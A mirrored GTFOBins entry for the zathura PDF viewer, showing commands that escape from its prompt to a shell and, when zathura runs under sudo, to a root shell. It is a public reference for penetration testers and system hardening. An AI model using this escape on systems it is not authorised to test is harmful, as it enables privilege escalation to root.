mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
3cdfea5714
Related to #293.
13 lines
283 B
Markdown
13 lines
283 B
Markdown
---
|
|
description: The interaction happens in a GUI window, while the shell is dropped in the terminal.
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
zathura
|
|
:! /bin/sh -c 'exec /bin/sh 0<&1'
|
|
sudo:
|
|
- code: |
|
|
sudo zathura
|
|
:! /bin/sh -c 'exec /bin/sh 0<&1'
|
|
---
|